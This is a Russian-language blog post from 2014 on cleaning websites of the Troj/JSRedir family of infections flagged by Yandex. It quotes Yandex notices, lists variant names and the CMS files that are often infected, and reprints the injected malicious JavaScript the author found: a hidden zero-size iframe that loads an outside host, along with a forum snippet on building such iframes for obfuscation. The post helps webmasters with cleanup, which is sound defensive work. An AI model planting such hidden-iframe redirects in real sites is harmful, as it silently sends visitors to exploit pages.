Вирус Troj/JSRedir-LR и его разновидности
Вторник, 14 Янв 2014 13:51Это первый пост, который я пишу в Новом году. Уже почти прошли все новогодние праздники (ну, за исключением разве что Старого-Нового года) и уже можно снимать новогодние украшения с блога. Хотя это, как говорится, на любителя, вон некоторые только новогоднюю ёлку умудряются в марте выкидывают.
Но это дело вкуса, а сейчас я расскажу о том, как бороться с вирусами на сайте, в частности с такими его разновидностями как, например, Troj/JSRedir-LR по классификации антивирусной компании Sophos. Если Вы ещё не ничего не слышали про компанию Софос, и думаете, что это какой-то очередной новичок на рынке антивирусного ПО, то глубоко ошибаетесь. Они на рынке уже довольно продолжительный период времени - около 15 лет и именно их антивирусные базы использует компания «Яндекс» для сканирования страниц в сети Интернет.
Из help-а Яндекса:
«Как Яндекс узнал о заражении?
Яндекс проверяет страницы сайтов из поискового индекса. Для определения, присутствует ли на странице вредоносный код, используется технология нашего партнера компании Sophos».
А начинается всё с того, что Яндекс начинает выкидывать страницы вашего сайта из индекса, хотя с точки зрения СЕО вы делали и делаете всё абсолютно правильно. И дело тут даже не в том, что хостинг просто-напросто заблокировал поисковых ботов Яндекса, как создающих излишнюю нагрузку на хостинг, а далее вы получаете письмо приблизительно такого содержания:
«Здравствуйте!
По данным поиска Яндекса, на Вашем сайте [название сайта] есть страницы, которые могут представлять угрозу для компьютеров посетителей. Поэтому в результатах поиска Яндекса ссылки на эти страницы помечаются как потенциально опасные.
Подробная информация о заражении Вашего сайта размещена на странице http://yandex.ru/infected?url=[название сайта]&l10n=ru .
Пожалуйста, удалите вредоносный код со страниц сайта. И после следующей проверки Яндекс уберёт из результатов поиска пометку о потенциальной опасности на Вашем сайте. Дополнительную информацию о поиске и удалении вредоносного кода Вы найдёте на странице http://help.yandex.ru/webmaster/?id=1059440#1059448.
Кроме того, мы рекомендуем Вам проверить сайт на наличие уязвимостей, которые могли привести к появлению на его страницах опасного содержимого. Советуем установить обновления системы управления сайтом и изменить пароли доступа администратора.
Для получения дополнительных данных о нарушении безопасности [название сайта], в том числе списка инфицированных страниц, зарегистрируйте сайт в Яндекс.Вебмастере (http://webmaster.yandex.ru). Через этот сервис также можно запросить перепроверку сайта сразу после удаления вредоносного кода с его страниц.
С уважением,
Команда безопасного поиска Яндекса
-----
Если это уведомление пришло к вам по ошибке, или Вы не хотите получать подобные сообщения на этот адрес по любой другой причине, перейдите по ссылке http://webmaster.yandex.ru/subscription.xml?action=unsubscribe&host= . Чтобы снова подписаться на рассылку - по ссылке http://webmaster.yandex.ru/subscription.xml?action=subscribe&host= .
Hi,
Some of the pages on your website may pose a threat to your visitor's computer security. The number of potentially harmful pages is 2. You can view the details of our malware scan at http://yandex.com/infected?url=[название сайта]&l10n=en . To learn about how to find malicious code and delete it from your pages, please go to the help section http://help.yandex.com/webmaster/?id=1115235#1115243 of our free website management service Yandex.Webmaster http://webmaster.yandex.com/.
Yandex is one of the world's leading search engines and a popular web portal (http://company.yandex.com/general_info/yandex_today.xml). We continually check all websites in our search index using our own antivirus suite which integrates the signature and the behavioral approaches to malware detection. Read more about our antivirus technology at http://company.yandex.com/technologies/antivirus_technology.xml.
This is an automated message to alert you about a problem detected on your website. This service free and does not require registration.
To receive additional information about your website, including the list of infected pages, or to request a check-up after the malicious code has been deleted, please register on our free website management service Yandex.Webmaster (http://webmaster.yandex.com).
Best regards,
Yandex Safe Search Team
If you are not the intended recipient of this message or if you do not wish to receive messages like this in the future, you can unsubscribe from our mailing list by clicking this link http://webmaster.yandex.com/subscription.xml?action=unsubscribe&host= . To subscribe to our mailing list again, click this link http://webmaster.yandex.com/subscription.xml?action=subscribe&host= .»
И вы понимаете, что над вашим кормильцем начинают сгущаться чёрные тучи. Что же делать в таком случае бедному вебмастеру, как избавиться от этой напасти в виде скриптовых редиректов, троянов и прочей напасти?
Последнее время я перелопатил множество форумов и собрал большое количество информации по этому вопросу и сейчас представлю всю эту информацию в хронологическом порядке, отбирая, на мой взгляд, самое нужное и полезное.
Итак, подобные сообщения начали появляться в сети в начале прошлого года, весной, а не летом, как многие думают, хотя основная масса взломов пришлась именно на июль-август минувшего года. Однако подобные взломы появляются до сих пор с завидной регулярностью, поэтому, думаю, все сведения из статьи будут актуальны и сейчас.
(Почему так получилось? Читайте дальше и всё поймёте).
Вебмастера начали получать письма, текст которых я привёл чуть выше. При общении с Платонами, то бишь службой технической поддержки компании «Яндекс», они получали следующие ответы:
«Ваш сайт содержит Troj/JSRedir-LR (по данным компании Sophos). При последней проверке Вашего сайта наши алгоритмы обнаружили код, автоматически перенаправляющий посетителей на (gettouch.biz, webservice1.net, getpdainfo.com и т. д.) при посещении сайта с мобильных устройств».
Соответственно на форумах как грибы после дождя стали появляться однотипные сообщения следующего содержания:
«Взломали сайт. В результатах поиска Яндекса мой сайт теперь с пометкой: Сайт может угрожать безопасности вашего компьютера или мобильного устройства», «Яндекс начал блокировать сайт. Обнаружил вирус Troj/JSRedir-LR, по данным компании Sophos. Не один антивирус его не находит, посторонней рекламы и баннеров нет. Подозрительного тоже ничего не находит», «Взломали сайт, что делать?» Итак, что же делать?
[original:seo-semki.ru]
Модификации вируса Troj/JSRedir-LR
Вот модификации вируса, наиболее часто поражающие сайты веб-мастеров в этот период времени: Troj/JSRedir-MH, Troj/JSRedir-MN, Troj/ExpJS-JU, Troj/JSRedir-DM.
А вообще количество подобных вирусов впечатляет:
«Troj/JSRedir-AK
Troj/JSRedir-AR
Troj/JSRedir-AU
Troj/JSRedir-AZ
Troj/JSRedir-BB
Troj/JSRedir-BD
Troj/JSRedir-BP
Troj/JSRedir-DC
Troj/JSRedir-DL
Troj/JSRedir-DO
Troj/JSRedir-DP
Troj/JSRedir-DT
Troj/JSRedir-DС
Troj/JSRedir-EF
Troj/JSRedir-FV
Troj/JSRedir-GS
Troj/JSRedir-GW
Troj/JsRedir-HA
Troj/JSRedir-HB
Troj/JSRedir-HZ
Troj/JSRedir-LH
Troj/JSRedir-LR
Troj/JSRedir-MH
Troj/JSRedir-MN
Troj/JSRedir-O
Troj/JSRedir-R
Troj/JSRedir-S»
Полный список всех подобных вирусов вы можете самостоятельно посмотреть на http://help.yandex.ru/webmaster/security/verdicts.xml.
Вот как описывают эти трояны в самой компании:
«Данный вердикт означает, что на странице присутствует обфусцированный JavaScript-код (имена переменных и функций могут отличаться для каждого конкретного скрипта). Особенностью данного заражения является то, что вредоносный код дописывается к одному из файлов, имеющих расширение .js на сайте. Чтобы удалить вредоносный код с сервера, воспользуйтесь нашими инструкциями. Пример вредоносного кода, по которому выносится вердикт:
Картинки кликабельны - кликайте для увеличения.
Чтобы удалить вредоносный код с сервера, воспользуйтесь нашими инструкциями».
Это описание вредоносного кода, по которому выносится вердикт Troj/JSRedir-LR, ссылка: http://help.yandex.ru/webmaster/security/verdicts.xml#h1128140.
А вот описание троянской программы Troj/JSRedir-MH:
«Данный вердикт означает, что на сайте присутствует вредоносный JavaScript-код, который загружает вредоносный swf-объект, производящий подгрузку эксплойтов посетителям сайта. Как правило, этот вредоносный код злоумышленники размещают в отдельном js-файле на взломанном сервере.
Чтобы удалить вредоносный код с сервера, воспользуйтесь нашими инструкциями.
Пример вредоносного кода, по которому выносится вердикт Troj/JSRedir-модификация».
Далее идет пример вредоносного кода.
Надо заметить, что осенью прошлого года я сам столкнулся с подобным вирусом, тогда на сайте wordpress «Яндекс» обнаружил вирус в плагине Flash Video Player. Плагин был включён, но не использовался.
В самый конец js-скрипта злоумышленники дописали такой код:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
var ifOIgm0 = document.createElement('iframe');
ifOIgm0.name = 'ifOIgm0';
ifOIgm0.src = 'http://cartul.ooff.ru/';
ifOIgm0.style.width = '0px';
ifOIgm0.style.height = '0px';
window.onload = function() {if (document.cookie.indexOf('ifOIgm0=') == -1) {document.cookie = 'ifOIgm0=yes; path=/;
expires=Wednesday, 18-May-33 03:33:20 GMT';
document.getElementsByTagName('body')[0].appendChild(ifOIgm0);}};
|
Код мы почистили, и больше он не появлялся. На аккаунте были и другие сайты, но они оказались нетронутыми. Поэтому мы решили, что дело в самом плагине видеопроигрывателя, что злоумышленники просто нашли в нём какую-то уязвимость, которую с успехом использовали. Плагин просто-напросто отключили, так как он всё равно не использовался.
Кстати, на ачате я нашел такую инфу -http://forum.antichat.ru/showthread.php?t=342398, тема создана 16.07.12, из чего можно сделать вывод, что именно в то время хакер планировал использовать айфрейм подобным образом (помните, об этом я говорил в само начале?)
«Создать iframe посредством JavaScript
Есть простой код:
1
|
<iframe name="iframe" src="http://site.ru" style="width: 640px; height: 800px;"></iframe>"
|
Можно ли его в javascript'e представить (мне нужно для последующей обфускации) и будет ли этот фрейм работать только в пределах
Вариант ответа:
1
2
3
4
5
6
7
8
9
10
11
|
var iframe = document.createElement('iframe');
iframe.name = 'iframe';
iframe.src = 'http://site.ru';
iframe.style.width = '640px';
iframe.style.height = '800px';
window.onload = function() { document.getElementsByTagName('body')[0].appendChild(iframe); };
|
Данный код, как вы видите, один в один! Только размеры фрейма указаны позже по 0 пикселей – «А чтоб никто не догадался».
Для справки: тег
И вот ещё интересная вещь. В панели вебмастера http://webmaster.yandex.ru/site/errors.xml?host=19166368 мы видим следующие ошибки:
«Исключённые страницы > Ошибки на стороне сервера или сайта
HTTP-статус: Доступ к ресурсу запрещён (403)
Доступ к документу запрещен (получен код 403 Forbidden). На запрос страниц ваш сервер вернул роботу HTTP-код 403. Если вы намеренно ограничили доступ к этим страницам, то исправлять ничего не требуется.
Если данные страницы должны индексироваться, то по вопросу возникновения и устранения этой проблемы, пожалуйста, обратитесь к администратору вашего сайта или сервера.
Дату возникновения ошибки вы можете видеть напротив каждой исключенной страницы в графе «Последнее посещение». Если с момента последнего обращения робота страницы вновь стали доступными (возвращают HTTP-код-200), то они автоматически будут проиндексированы по мере обхода сайта, после чего появятся в поиске с обновлениями поисковых баз».
Ясное дело, что никто намеренно не ограничивал яндекс-роботу доступа к сайту, в robots.txt вообще не было никаких запретов. Но как только был удалён вредоносный код, то и количество ошибок упало в три раза. Скриншот:
Файлы и джаваскрипты, в которых наиболее часто встречался вредоносный код
Количество таких модулей по понятным причинам огромно, поэтому приведу лишь некоторые из них.
Итак, вирусный код поражал следующие файлы:
CMS Joomla (Джумла)
Модуль AutsonSlideShow - бесплатный модуль слайд шоу, работающий на основе библиотеки jQuery. Меняли файл default.php, находящийся в mod_AutsonSlideShow, папка tmpl.
Файлы:
/media/system/js.caption.js
/includes/js/tabs/mememe.js
/administrator/templates/bluestork/main.js
/components/com_virtuemart/assets/js/vmsite.js
/administrator/images/bookmarks.php
/administrator/images/nyla.swf
CMS WordPress (Вордпресс)
Вирус изменял или добавлял (как правило, флэш) следующие файлы:
/wp-includes/images/smilies/functions.js
/wp-includes/images/smilies/galata.js
/wp-includes/js/l10n.js
/wp-includes/js/comment-reply.js
/wp-content/plugins/flash-video-player/swfobject.js
/wp-content/themes/twentytwelve/js/navigation.js
/wp-content/plugins/auto-highslide/highslide/highslide-with-html.packed.js
/wp-includes/images/crystal/video.php
/wp-admin/js/set-post-thumbnail.dev.php
Flash-объекты:
/admin/media/images/forward_enabled.swf
/wp-includes/images/crystal/video.swf
/wp-includes/images/crystal/jomama.swf
melbourne.swf (как вариант, создавался дополнительный файл, который содержал в себе exploit.SWF.254).
CMS DLE (на примере ДЛЕ 10)
engine/classes/js/dle_js.js
/sites/default/files/images/mines.swf
/sites/default/files/blaine.js
/modules/comment/comment-wrapper.tpl1.php
Форумный движок vbulletin. Посторонний код добавлялся в файлы
yuiloader-dom-event.js
vbulletin-core.js
vbulletin_cms.js
index.php
content.php
Менялись также как родные скрипты движков, так и создавались новые, с произвольными именами:
/images/cheet.js
/js/jquery.js
/js/slide.js
functions.js
navigation.js
photos.js
vote.js
Если новые файлы создавались в папках с картинками (images), то они брали имена любых из этих изображений, например, gradient3a.php или no_avatar23.php.
[original:seо-sеmki.ru]
Примеры вставок в файлы, которые ввели на зараженные скрипты:
document.write("
<"+"/script>"); document.write("
<"+"/script>"); document.write("
<"+"/script>"); document.write("
<"+"/script>"); document.write("
<"+"/script>"); document.write("
<"+"/script>"); document.write("
<"+"/script>");
Но вернёмся к началу. Количество взломанных сайтов росло, на соответствующих форумах создавались всё новые темы, но никто не мог дать ответа на конкретный вопрос: Как происходит заражение и почему обычные меры безопасности, принятые в таких случаях, не помогают?
Читать далее «Уязвимость крылась на хостинге»
Читать похожие статьи:
Подпишитесь на комментарии, чтобы не пропустить
важный ответ:


Уязвимость крылась на хостинге | SEO-semki пишет:
16 Янв 2014 в 20:10
[…] Начало «Вирус Troj/JSRedir-LR и его разновидности» […]
Как защитить сайт от взлома | SEO-semki пишет:
16 Янв 2014 в 20:51
[…] Читать начало «Вирус Troj/JSRedir-LR и его разновидности» […]
50cent пишет:
21 Янв 2014 в 21:35
Супер, помогло. Афтор, давай же, пишы исчо!
seo пишет:
22 Янв 2014 в 16:57
Уже пишу :razz:
Под ударом магазины опенкарт (ocStore) | SEO-semki пишет:
28 Янв 2014 в 17:15
[…] после того, как я закончил набирать сообщение про вирусы семейства Troj/JSRedir и их разновидности, как тут же решил продолжить эту […]
Владик пишет:
25 Фев 2014 в 11:25
Никто у себя не замечал последнее время переходы по статистике Ли со следующих адресов:
yandex.ru/clck/jsredir?from=yandex.ua?
seo пишет:
25 Фев 2014 в 13:06
Похоже на переходы с поисковых систем, а что, собственно говоря, вас смущает?
vislouh пишет:
25 Фев 2014 в 21:16
Также заметил у себя такие переходы clck.yandex.ru/jsredir, склоняюсь к мысли, что это переходы из поиска по яндексу, но вот почему не показывает ключевые слова?
Гена пишет:
26 Фев 2014 в 07:46
У меня такое было когда пытался перейти из поисковика yandex на сайт download-photoshop-cs6.com. Avast блокирует ссылку yandex.ru/clck/jsredir?from с вердиктом HTML:RedirME-inf [Trj]. Но что интересно, если пытаться зайти из кеша, то блокирует уже с вердиктом HTML:RedirBA-inf [Trj].
Но ни в google, ни в yandex никаких отметок о вредоносности сайта не стоит. Софос, я так понимаю, ничего не обнаружил.
Если проверить сайт на virustotal, то из 51 антивируса только один малоизвестный показывает наличие malware, все остальные, в том числе и такие известные как Dr.Web ничего не обнаруживают.
stezhka пишет:
30 Апр 2014 в 08:02
Сколько много разных вирусов существует, никогда бы не подумала
seo пишет:
30 Апр 2014 в 18:00
Да, вы правы, очень и очень много
sergey пишет:
30 Апр 2014 в 11:14
Здравствуйте, антвирус выдает следующее:
Заражение: HTML:RedirBA-inf[Trj]
Поможете решить проблему?
seo пишет:
30 Апр 2014 в 18:01
Конечно помогу. Попробуйте почистить все файлы по инструкции, которая здесь есть, и если останутся какие-нибудь вопросы - обращайтесь.